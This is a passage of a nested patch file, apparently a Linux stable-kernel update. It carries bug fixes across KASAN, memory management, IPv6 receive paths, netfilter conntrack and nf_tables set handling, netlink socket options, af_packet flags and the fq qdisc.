+ 		  suite->name);
+-	kunit_log(KERN_INFO, suite, KUNIT_SUBTEST_INDENT "1..%zd",
++	pr_info(KUNIT_SUBTEST_INDENT "1..%zd\n",
+ 		  kunit_suite_num_test_cases(suite));
+ }
+ 
+@@ -172,10 +180,9 @@ static void kunit_print_ok_not_ok(void *test_or_suite,
+ 
+ 	/*
+ 	 * We do not log the test suite results as doing so would
+-	 * mean debugfs display would consist of the test suite
+-	 * description and status prior to individual test results.
+-	 * Hence directly printk the suite status, and we will
+-	 * separately seq_printf() the suite status for the debugfs
++	 * mean debugfs display would consist of an incorrect test
++	 * number. Hence directly printk the suite result, and we will
++	 * separately seq_printf() the suite results for the debugfs
+ 	 * representation.
+ 	 */
+ 	if (suite)
+diff --git a/mm/kasan/hw_tags.c b/mm/kasan/hw_tags.c
+index b22c4f461cb0b..cc9bc99e47cd1 100644
+--- a/mm/kasan/hw_tags.c
++++ b/mm/kasan/hw_tags.c
+@@ -225,7 +225,7 @@ static void init_vmalloc_pages(const void *start, unsigned long size)
+ 	const void *addr;
+ 
+ 	for (addr = start; addr < start + size; addr += PAGE_SIZE) {
+-		struct page *page = virt_to_page(addr);
++		struct page *page = vmalloc_to_page(addr);
+ 
+ 		clear_highpage_kasan_tagged(page);
+ 	}
+@@ -237,7 +237,7 @@ void *__kasan_unpoison_vmalloc(const void *start, unsigned long size,
+ 	u8 tag;
+ 	unsigned long redzone_start, redzone_size;
+ 
+-	if (!kasan_vmalloc_enabled() || !is_vmalloc_or_module_addr(start)) {
++	if (!kasan_vmalloc_enabled()) {
+ 		if (flags & KASAN_VMALLOC_INIT)
+ 			init_vmalloc_pages(start, size);
+ 		return (void *)start;
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index e132f70a059e8..7d36dd95d1fff 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -802,8 +802,10 @@ static int mbind_range(struct vma_iterator *vmi, struct vm_area_struct *vma,
+ 		vmstart = vma->vm_start;
+ 	}
+ 
+-	if (mpol_equal(vma_policy(vma), new_pol))
++	if (mpol_equal(vma_policy(vma), new_pol)) {
++		*prev = vma;
+ 		return 0;
++	}
+ 
+ 	pgoff = vma->vm_pgoff + ((vmstart - vma->vm_start) >> PAGE_SHIFT);
+ 	merged = vma_merge(vma->vm_mm, *prev, vmstart, vmend, vma->vm_flags,
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index 5b7b8d4f5297f..8168fee6a85b9 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -1905,6 +1905,16 @@ retry:
+ 			}
+ 		}
+ 
++		/*
++		 * Folio is unmapped now so it cannot be newly pinned anymore.
++		 * No point in trying to reclaim folio if it is pinned.
++		 * Furthermore we don't want to reclaim underlying fs metadata
++		 * if the folio is pinned and thus potentially modified by the
++		 * pinning process as that may upset the filesystem.
++		 */
++		if (folio_maybe_dma_pinned(folio))
++			goto activate_locked;
++
+ 		mapping = folio_mapping(folio);
+ 		if (folio_test_dirty(folio)) {
+ 			/*
+diff --git a/net/8021q/vlan_dev.c b/net/8021q/vlan_dev.c
+index 296d0145932f4..5920544e93e82 100644
+--- a/net/8021q/vlan_dev.c
++++ b/net/8021q/vlan_dev.c
+@@ -365,7 +365,7 @@ static int vlan_dev_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
+ 
+ 	switch (cmd) {
+ 	case SIOCSHWTSTAMP:
+-		if (!net_eq(dev_net(dev), &init_net))
++		if (!net_eq(dev_net(dev), dev_net(real_dev)))
+ 			break;
+ 		fallthrough;
+ 	case SIOCGMIIPHY:
+diff --git a/net/core/bpf_sk_storage.c b/net/core/bpf_sk_storage.c
+index bb378c33f542c..6a4b3e9313241 100644
+--- a/net/core/bpf_sk_storage.c
++++ b/net/core/bpf_sk_storage.c
+@@ -100,8 +100,8 @@ static void *bpf_fd_sk_storage_lookup_elem(struct bpf_map *map, void *key)
+ 	return ERR_PTR(err);
+ }
+ 
+-static int bpf_fd_sk_storage_update_elem(struct bpf_map *map, void *key,
+-					 void *value, u64 map_flags)
++static long bpf_fd_sk_storage_update_elem(struct bpf_map *map, void *key,
++					  void *value, u64 map_flags)
+ {
+ 	struct bpf_local_storage_data *sdata;
+ 	struct socket *sock;
+@@ -120,7 +120,7 @@ static int bpf_fd_sk_storage_update_elem(struct bpf_map *map, void *key,
+ 	return err;
+ }
+ 
+-static int bpf_fd_sk_storage_delete_elem(struct bpf_map *map, void *key)
++static long bpf_fd_sk_storage_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct socket *sock;
+ 	int fd, err;
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 43e1b89695c22..6f5ef18a8b772 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -5038,6 +5038,9 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb,
+ 			skb = alloc_skb(0, GFP_ATOMIC);
+ 	} else {
+ 		skb = skb_clone(orig_skb, GFP_ATOMIC);
++
++		if (skb_orphan_frags_rx(skb, GFP_ATOMIC))
++			return;
+ 	}
+ 	if (!skb)
+ 		return;
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index a68a7290a3b2b..a055139f410e2 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -437,7 +437,7 @@ static void sock_map_delete_from_link(struct bpf_map *map, struct sock *sk,
+ 	__sock_map_delete(stab, sk, link_raw);
+ }
+ 
+-static int sock_map_delete_elem(struct bpf_map *map, void *key)
++static long sock_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_stab *stab = container_of(map, struct bpf_stab, map);
+ 	u32 i = *(u32 *)key;
+@@ -587,8 +587,8 @@ out:
+ 	return ret;
+ }
+ 
+-static int sock_map_update_elem(struct bpf_map *map, void *key,
+-				void *value, u64 flags)
++static long sock_map_update_elem(struct bpf_map *map, void *key,
++				 void *value, u64 flags)
+ {
+ 	struct sock *sk = (struct sock *)value;
+ 	int ret;
+@@ -916,7 +916,7 @@ static void sock_hash_delete_from_link(struct bpf_map *map, struct sock *sk,
+ 	raw_spin_unlock_bh(&bucket->lock);
+ }
+ 
+-static int sock_hash_delete_elem(struct bpf_map *map, void *key)
++static long sock_hash_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_shtab *htab = container_of(map, struct bpf_shtab, map);
+ 	u32 hash, key_size = map->key_size;
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index b9d7c3dd1cb39..c0fd8f5f3b94e 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -783,6 +783,7 @@ lookup:
+ 
+ 	if (!xfrm6_policy_check(sk, XFRM_POLICY_IN, skb))
+ 		goto discard_and_relse;
++	nf_reset_ct(skb);
+ 
+ 	return __sk_receive_skb(sk, skb, 1, dh->dccph_doff * 4,
+ 				refcounted) ? -1 : 0;
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index 922c87ef1ab58..2a07588265c70 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -1570,9 +1570,19 @@ struct sk_buff *__ip_make_skb(struct sock *sk,
+ 	cork->dst = NULL;
+ 	skb_dst_set(skb, &rt->dst);
+ 
+-	if (iph->protocol == IPPROTO_ICMP)
+-		icmp_out_count(net, ((struct icmphdr *)
+-			skb_transport_header(skb))->type);
++	if (iph->protocol == IPPROTO_ICMP) {
++		u8 icmp_type;
++
++		/* For such sockets, transhdrlen is zero when do ip_append_data(),
++		 * so icmphdr does not in skb linear region and can not get icmp_type
++		 * by icmp_hdr(skb)->type.
++		 */
++		if (sk->sk_type == SOCK_RAW && !inet_sk(sk)->hdrincl)
++			icmp_type = fl4->fl4_icmp_type;
++		else
++			icmp_type = icmp_hdr(skb)->type;
++		icmp_out_count(net, icmp_type);
++	}
+ 
+ 	ip_cork_release(cork);
+ out:
+diff --git a/net/ipv6/ip6_input.c b/net/ipv6/ip6_input.c
+index e1ebf5e42ebe9..d94041bb42872 100644
+--- a/net/ipv6/ip6_input.c
++++ b/net/ipv6/ip6_input.c
+@@ -404,10 +404,6 @@ resubmit_final:
+ 			/* Only do this once for first final protocol */
+ 			have_final = true;
+ 
+-			/* Free reference early: we don't need it any more,
+-			   and it may hold ip_conntrack module loaded
+-			   indefinitely. */
+-			nf_reset_ct(skb);
+ 
+ 			skb_postpull_rcsum(skb, skb_network_header(skb),
+ 					   skb_network_header_len(skb));
+@@ -430,10 +426,12 @@ resubmit_final:
+ 				goto discard;
+ 			}
+ 		}
+-		if (!(ipprot->flags & INET6_PROTO_NOPOLICY) &&
+-		    !xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) {
+-			SKB_DR_SET(reason, XFRM_POLICY);
+-			goto discard;
++		if (!(ipprot->flags & INET6_PROTO_NOPOLICY)) {
++			if (!xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) {
++				SKB_DR_SET(reason, XFRM_POLICY);
++				goto discard;
++			}
++			nf_reset_ct(skb);
+ 		}
+ 
+ 		ret = INDIRECT_CALL_2(ipprot->handler, tcp_v6_rcv, udpv6_rcv,
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index 4fc511bdf176c..f44b99f7ecdcc 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -193,10 +193,8 @@ static bool ipv6_raw_deliver(struct sk_buff *skb, int nexthdr)
+ 			struct sk_buff *clone = skb_clone(skb, GFP_ATOMIC);
+ 
+ 			/* Not releasing hash table! */
+-			if (clone) {
+-				nf_reset_ct(clone);
++			if (clone)
+ 				rawv6_rcv(sk, clone);
+-			}
+ 		}
+ 	}
+ 	rcu_read_unlock();
+@@ -387,6 +385,7 @@ int rawv6_rcv(struct sock *sk, struct sk_buff *skb)
+ 		kfree_skb(skb);
+ 		return NET_RX_DROP;
+ 	}
++	nf_reset_ct(skb);
+ 
+ 	if (!rp->checksum)
+ 		skb->ip_summed = CHECKSUM_UNNECESSARY;
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index a52a4f12f1467..e4da7267ed4bd 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1721,6 +1721,8 @@ process:
+ 	if (drop_reason)
+ 		goto discard_and_relse;
+ 
++	nf_reset_ct(skb);
++
+ 	if (tcp_filter(sk, skb)) {
+ 		drop_reason = SKB_DROP_REASON_SOCKET_FILTER;
+ 		goto discard_and_relse;
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index a675acfb901d1..c519f21632656 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -704,6 +704,7 @@ static int udpv6_queue_rcv_one_skb(struct sock *sk, struct sk_buff *skb)
+ 		drop_reason = SKB_DROP_REASON_XFRM_POLICY;
+ 		goto drop;
+ 	}
++	nf_reset_ct(skb);
+ 
+ 	if (static_branch_unlikely(&udpv6_encap_needed_key) && up->encap_type) {
+ 		int (*encap_rcv)(struct sock *sk, struct sk_buff *skb);
+@@ -1027,6 +1028,7 @@ int __udp6_lib_rcv(struct sk_buff *skb, struct udp_table *udptable,
+ 
+ 	if (!xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb))
+ 		goto discard;
++	nf_reset_ct(skb);
+ 
+ 	if (udp_lib_checksum_complete(skb))
+ 		goto csum_error;
+diff --git a/net/netfilter/nf_conntrack_bpf.c b/net/netfilter/nf_conntrack_bpf.c
+index e1af14e3b63c5..24002bc61e07e 100644
+--- a/net/netfilter/nf_conntrack_bpf.c
++++ b/net/netfilter/nf_conntrack_bpf.c
+@@ -381,6 +381,7 @@ struct nf_conn *bpf_ct_insert_entry(struct nf_conn___init *nfct_i)
+ 	struct nf_conn *nfct = (struct nf_conn *)nfct_i;
+ 	int err;
+ 
++	nfct->status |= IPS_CONFIRMED;
+ 	err = nf_conntrack_hash_check_insert(nfct);
+ 	if (err < 0) {
+ 		nf_conntrack_free(nfct);
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index 19e3afb23fdaf..cf731546e865b 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -934,7 +934,6 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 		goto out;
+ 	}
+ 
+-	ct->status |= IPS_CONFIRMED;
+ 	smp_wmb();
+ 	/* The caller holds a reference to this object */
+ 	refcount_set(&ct->ct_general.use, 2);
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index d095d3c1ceca6..cb4325b8ebb11 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -176,7 +176,12 @@ nla_put_failure:
+ static int ctnetlink_dump_timeout(struct sk_buff *skb, const struct nf_conn *ct,
+ 				  bool skip_zero)
+ {
+-	long timeout = nf_ct_expires(ct) / HZ;
++	long timeout;
++
++	if (nf_ct_is_confirmed(ct))
++		timeout = nf_ct_expires(ct) / HZ;
++	else
++		timeout = ct->timeout / HZ;
+ 
+ 	if (skip_zero && timeout == 0)
+ 		return 0;
+@@ -2253,9 +2258,6 @@ ctnetlink_create_conntrack(struct net *net,
+ 	if (!cda[CTA_TIMEOUT])
+ 		goto err1;
+ 
+-	timeout = (u64)ntohl(nla_get_be32(cda[CTA_TIMEOUT])) * HZ;
+-	__nf_ct_set_timeout(ct, timeout);
+-
+ 	rcu_read_lock();
+  	if (cda[CTA_HELP]) {
+ 		char *helpname = NULL;
+@@ -2316,6 +2318,12 @@ ctnetlink_create_conntrack(struct net *net,
+ 	nfct_seqadj_ext_add(ct);
+ 	nfct_synproxy_ext_add(ct);
+ 
++	/* we must add conntrack extensions before confirmation. */
++	ct->status |= IPS_CONFIRMED;
++
++	timeout = (u64)ntohl(nla_get_be32(cda[CTA_TIMEOUT])) * HZ;
++	__nf_ct_set_timeout(ct, timeout);
++
+ 	if (cda[CTA_STATUS]) {
+ 		err = ctnetlink_change_status(ct, cda);
+ 		if (err < 0)
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index ce8a047ef8306..96bc4b8ded423 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -4984,12 +4984,24 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 	}
+ }
+ 
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	if (nft_set_is_anonymous(set))
++		nft_clear(ctx->net, set);
++
++	set->use++;
++}
++EXPORT_SYMBOL_GPL(nf_tables_activate_set);
++
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase)
+ {
+ 	switch (phase) {
+ 	case NFT_TRANS_PREPARE:
++		if (nft_set_is_anonymous(set))
++			nft_deactivate_next(ctx->net, set);
++
+ 		set->use--;
+ 		return;
+ 	case NFT_TRANS_ABORT:
+@@ -8571,6 +8583,8 @@ static int nf_tables_validate(struct net *net)
+ 			if (nft_table_validate(net, table) < 0)
+ 				return -EAGAIN;
+ 		}
++
++		nft_validate_state_update(net, NFT_VALIDATE_SKIP);
+ 		break;
+ 	}
+ 
+@@ -9491,11 +9505,6 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 	return 0;
+ }
+ 
+-static void nf_tables_cleanup(struct net *net)
+-{
+-	nft_validate_state_update(net, NFT_VALIDATE_SKIP);
+-}
+-
+ static int nf_tables_abort(struct net *net, struct sk_buff *skb,
+ 			   enum nfnl_abort_action action)
+ {
+@@ -9529,7 +9538,6 @@ static const struct nfnetlink_subsystem nf_tables_subsys = {
+ 	.cb		= nf_tables_cb,
+ 	.commit		= nf_tables_commit,
+ 	.abort		= nf_tables_abort,
+-	.cleanup	= nf_tables_cleanup,
+ 	.valid_genid	= nf_tables_valid_genid,
+ 	.owner		= THIS_MODULE,
+ };
+diff --git a/net/netfilter/nfnetlink.c b/net/netfilter/nfnetlink.c
+index 81c7737c803a6..ae7146475d17a 100644
+--- a/net/netfilter/nfnetlink.c
++++ b/net/netfilter/nfnetlink.c
+@@ -590,8 +590,6 @@ done:
+ 			goto replay_abort;
+ 		}
+ 	}
+-	if (ss->cleanup)
+-		ss->cleanup(net);
+ 
+ 	nfnl_err_deliver(&err_list, oskb);
+ 	kfree_skb(skb);
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index 274579b1696e0..bd19c7aec92ee 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -342,7 +342,7 @@ static void nft_dynset_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_dynset *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_dynset_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index cecf8ab90e58f..03ef4fdaa460b 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -167,7 +167,7 @@ static void nft_lookup_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_lookup *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_lookup_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
+index 7b01aa2ef6531..d985d361ed8ad 100644
+--- a/net/netfilter/nft_objref.c
++++ b/net/netfilter/nft_objref.c
+@@ -185,7 +185,7 @@ static void nft_objref_map_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_objref_map *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_objref_map_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index f365dfdd672d7..9b6eb28e6e94f 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1742,7 +1742,8 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct netlink_sock *nlk = nlk_sk(sk);
+-	int len, val, err;
++	unsigned int flag;
++	int len, val;
+ 
+ 	if (level != SOL_NETLINK)
+ 		return -ENOPROTOOPT;
+@@ -1754,39 +1755,17 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ 
+ 	switch (optname) {
+ 	case NETLINK_PKTINFO:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_RECV_PKTINFO ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_RECV_PKTINFO;
+ 		break;
+ 	case NETLINK_BROADCAST_ERROR:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_BROADCAST_SEND_ERROR ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_BROADCAST_SEND_ERROR;
+ 		break;
+ 	case NETLINK_NO_ENOBUFS:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_RECV_NO_ENOBUFS ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_RECV_NO_ENOBUFS;
+ 		break;
+ 	case NETLINK_LIST_MEMBERSHIPS: {
+-		int pos, idx, shift;
++		int pos, idx, shift, err = 0;
+ 
+-		err = 0;
+ 		netlink_lock_table();
+ 		for (pos = 0; pos * 8 < nlk->ngroups; pos += sizeof(u32)) {
+ 			if (len - pos < sizeof(u32))
+@@ -1803,40 +1782,32 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ 		if (put_user(ALIGN(nlk->ngroups / 8, sizeof(u32)), optlen))
+ 			err = -EFAULT;
+ 		netlink_unlock_table();
+-		break;
++		return err;
+ 	}
+ 	case NETLINK_CAP_ACK:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_CAP_ACK ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_CAP_ACK;
+ 		break;
+ 	case NETLINK_EXT_ACK:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_EXT_ACK ? 1 : 0;
+-		if (put_user(len, optlen) || put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_EXT_ACK;
+ 		break;
+ 	case NETLINK_GET_STRICT_CHK:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_STRICT_CHK ? 1 : 0;
+-		if (put_user(len, optlen) || put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_STRICT_CHK;
+ 		break;
+ 	default:
+-		err = -ENOPROTOOPT;
++		return -ENOPROTOOPT;
+ 	}
+-	return err;
++
++	if (len < sizeof(int))
++		return -EINVAL;
++
++	len = sizeof(int);
++	val = nlk->flags & flag ? 1 : 0;
++
++	if (put_user(len, optlen) ||
++	    copy_to_user(optval, &val, len))
++		return -EFAULT;
++
++	return 0;
+ }
+ 
+ static void netlink_cmsg_recv_pktinfo(struct msghdr *msg, struct sk_buff *skb)
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index b5ab98ca2511b..1259b34a28ebe 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -307,7 +307,8 @@ static void packet_cached_dev_reset(struct packet_sock *po)
+ 
+ static bool packet_use_direct_xmit(const struct packet_sock *po)
+ {
+-	return po->xmit == packet_direct_xmit;
++	/* Paired with WRITE_ONCE() in packet_setsockopt() */
++	return READ_ONCE(po->xmit) == packet_direct_xmit;
+ }
+ 
+ static u16 packet_pick_tx_queue(struct sk_buff *skb)
+@@ -2185,7 +2186,7 @@ static int packet_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	sll = &PACKET_SKB_CB(skb)->sa.ll;
+ 	sll->sll_hatype = dev->type;
+ 	sll->sll_pkttype = skb->pkt_type;
+-	if (unlikely(po->origdev))
++	if (unlikely(packet_sock_flag(po, PACKET_SOCK_ORIGDEV)))
+ 		sll->sll_ifindex = orig_dev->ifindex;
+ 	else
+ 		sll->sll_ifindex = dev->ifindex;
+@@ -2460,7 +2461,7 @@ static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	sll->sll_hatype = dev->type;
+ 	sll->sll_protocol = skb->protocol;
+ 	sll->sll_pkttype = skb->pkt_type;
+-	if (unlikely(po->origdev))
++	if (unlikely(packet_sock_flag(po, PACKET_SOCK_ORIGDEV)))
+ 		sll->sll_ifindex = orig_dev->ifindex;
+ 	else
+ 		sll->sll_ifindex = dev->ifindex;
+@@ -2867,7 +2868,8 @@ tpacket_error:
+ 		packet_inc_pending(&po->tx_ring);
+ 
+ 		status = TP_STATUS_SEND_REQUEST;
+-		err = po->xmit(skb);
++		/* Paired with WRITE_ONCE() in packet_setsockopt() */
++		err = READ_ONCE(po->xmit)(skb);
+ 		if (unlikely(err != 0)) {
+ 			if (err > 0)
+ 				err = net_xmit_errno(err);
+@@ -3070,7 +3072,8 @@ static int packet_snd(struct socket *sock, struct msghdr *msg, size_t len)
+ 		virtio_net_hdr_set_proto(skb, &vnet_hdr);
+ 	}
+ 
+-	err = po->xmit(skb);
++	/* Paired with WRITE_ONCE() in packet_setsockopt() */
++	err = READ_ONCE(po->xmit)(skb);
+ 	if (unlikely(err != 0)) {
+ 		if (err > 0)
+ 			err = net_xmit_errno(err);
+@@ -3513,7 +3516,7 @@ static int packet_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 		memcpy(msg->msg_name, &PACKET_SKB_CB(skb)->sa, copy_len);
+ 	}
+ 
+-	if (pkt_sk(sk)->auxdata) {
++	if (packet_sock_flag(pkt_sk(sk), PACKET_SOCK_AUXDATA)) {
+ 		struct tpacket_auxdata aux;
+ 
+ 		aux.tp_status = TP_STATUS_USER;
+@@ -3897,9 +3900,7 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 			return -EFAULT;
+ 
+-		lock_sock(sk);
+-		po->auxdata = !!val;
+-		release_sock(sk);
++		packet_sock_flag_set(po, PACKET_SOCK_AUXDATA, val);
+ 		return 0;
+ 	}
+ 	case PACKET_ORIGDEV:
+@@ -3911,9 +3912,7 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 			return -EFAULT;
+ 
+-		lock_sock(sk);
+-		po->origdev = !!val;
+-		release_sock(sk);
++		packet_sock_flag_set(po, PACKET_SOCK_ORIGDEV, val);
+ 		return 0;
+ 	}
+ 	case PACKET_VNET_HDR:
+@@ -4007,7 +4006,8 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 			return -EFAULT;
+ 
+-		po->xmit = val ? packet_direct_xmit : dev_queue_xmit;
++		/* Paired with all lockless reads of po->xmit */
++		WRITE_ONCE(po->xmit, val ? packet_direct_xmit : dev_queue_xmit);
+ 		return 0;
+ 	}
+ 	default:
+@@ -4058,10 +4058,10 @@ static int packet_getsockopt(struct socket *sock, int level, int optname,
+ 
+ 		break;
+ 	case PACKET_AUXDATA:
+-		val = po->auxdata;
++		val = packet_sock_flag(po, PACKET_SOCK_AUXDATA);
+ 		break;
+ 	case PACKET_ORIGDEV:
+-		val = po->origdev;
++		val = packet_sock_flag(po, PACKET_SOCK_ORIGDEV);
+ 		break;
+ 	case PACKET_VNET_HDR:
+ 		val = po->has_vnet_hdr;
+diff --git a/net/packet/diag.c b/net/packet/diag.c
+index 07812ae5ca073..d704c7bf51b20 100644
+--- a/net/packet/diag.c
++++ b/net/packet/diag.c
+@@ -23,9 +23,9 @@ static int pdiag_put_info(const struct packet_sock *po, struct sk_buff *nlskb)
+ 	pinfo.pdi_flags = 0;
+ 	if (po->running)
+ 		pinfo.pdi_flags |= PDI_RUNNING;
+-	if (po->auxdata)
++	if (packet_sock_flag(po, PACKET_SOCK_AUXDATA))
+ 		pinfo.pdi_flags |= PDI_AUXDATA;
+-	if (po->origdev)
++	if (packet_sock_flag(po, PACKET_SOCK_ORIGDEV))
+ 		pinfo.pdi_flags |= PDI_ORIGDEV;
+ 	if (po->has_vnet_hdr)
+ 		pinfo.pdi_flags |= PDI_VNETHDR;
+diff --git a/net/packet/internal.h b/net/packet/internal.h
+index 48af35b1aed25..3bae8ea7a36f5 100644
+--- a/net/packet/internal.h
++++ b/net/packet/internal.h
+@@ -116,10 +116,9 @@ struct packet_sock {
+ 	int			copy_thresh;
+ 	spinlock_t		bind_lock;
+ 	struct mutex		pg_vec_lock;
++	unsigned long		flags;
+ 	unsigned int		running;	/* bind_lock must be held */
+-	unsigned int		auxdata:1,	/* writer must hold sock lock */
+-				origdev:1,
+-				has_vnet_hdr:1,
++	unsigned int		has_vnet_hdr:1, /* writer must hold sock lock */
+ 				tp_loss:1,
+ 				tp_tx_has_off:1;
+ 	int			pressure;
+@@ -144,4 +143,25 @@ static inline struct packet_sock *pkt_sk(struct sock *sk)
+ 	return (struct packet_sock *)sk;
+ }
+ 
++enum packet_sock_flags {
++	PACKET_SOCK_ORIGDEV,
++	PACKET_SOCK_AUXDATA,
++};
++
++static inline void packet_sock_flag_set(struct packet_sock *po,
++					enum packet_sock_flags flag,
++					bool val)
++{
++	if (val)
++		set_bit(flag, &po->flags);
++	else
++		clear_bit(flag, &po->flags);
++}
++
++static inline bool packet_sock_flag(const struct packet_sock *po,
++				    enum packet_sock_flags flag)
++{
++	return test_bit(flag, &po->flags);
++}
++
+ #endif
+diff --git a/net/rxrpc/key.c b/net/rxrpc/key.c
+index 8d53aded09c42..33e8302a79e33 100644
+--- a/net/rxrpc/key.c
++++ b/net/rxrpc/key.c
+@@ -680,7 +680,7 @@ static long rxrpc_read(const struct key *key,
+ 			return -ENOPKG;
+ 		}
+ 
+-		if (WARN_ON((unsigned long)xdr - (unsigned long)oldxdr ==
++		if (WARN_ON((unsigned long)xdr - (unsigned long)oldxdr !=
+ 			    toksize))
+ 			return -EIO;
+ 	}
+diff --git a/net/sched/sch_fq.c b/net/sched/sch_fq.c
+index 48d14fb90ba02..f59a2cb2c803d 100644
+--- a/net/sched/sch_fq.c
++++ b/net/sched/sch_fq.c
+@@ -779,13 +779,17 @@ static int fq_resize(struct Qdisc *sch, u32 log)
+ 	return 0;
+ }
+ 
++static struct netlink_range_validation iq_range = {
++	.max = INT_MAX,
++};
++
+ static const struct nla_policy fq_policy[TCA_FQ_MAX + 1] = {
+ 	[TCA_FQ_UNSPEC]			= { .strict_start_type = TCA_FQ_TIMER_SLACK },
+ 
+ 	[TCA_FQ_PLIMIT]			= { .type = NLA_U32 },
